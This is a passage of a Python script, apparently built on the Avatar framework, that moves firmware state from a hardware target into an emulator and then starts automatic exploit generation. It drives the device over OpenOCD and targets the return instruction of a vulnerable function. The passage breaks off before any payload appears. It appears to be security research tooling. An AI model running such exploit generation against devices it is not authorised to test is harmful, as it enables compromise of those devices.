print("AVATAR: Transferring state from target to emulator") transfer_mem_to_emulator(avatar, 0x20000000, 0x00001000) print("AVATAR: Memory transfer complete") transfer_cpu_state_to_emulator(avatar) print("AVATAR: Register transfer complete") print("AVATAR: Continuing emulation") avatar.get_emulator().cont() print("AVATAR: Completed firmware analysis") print("Press enter to begin exploit generation") keyboard = input () avatar.stop () print("EXPLOIT: Beginning automatic exploit generation") # This section is run in two threads, since concurrency is important # A thread is used to manage the target device, and another is used to # generate and send an exploit to the device. # Lots of sleeps needed to be inserted since we are dealing with slow hardware def device_thread (): print("EXPLOIT: Resetting device...") cmd = OpenocdTarget(hwmon.get_telnet_jigsock()) time.sleep (3) cmd.halt () # Remove the old breakpoint, and set a new one at the "ret" instruction # of the vulnerable function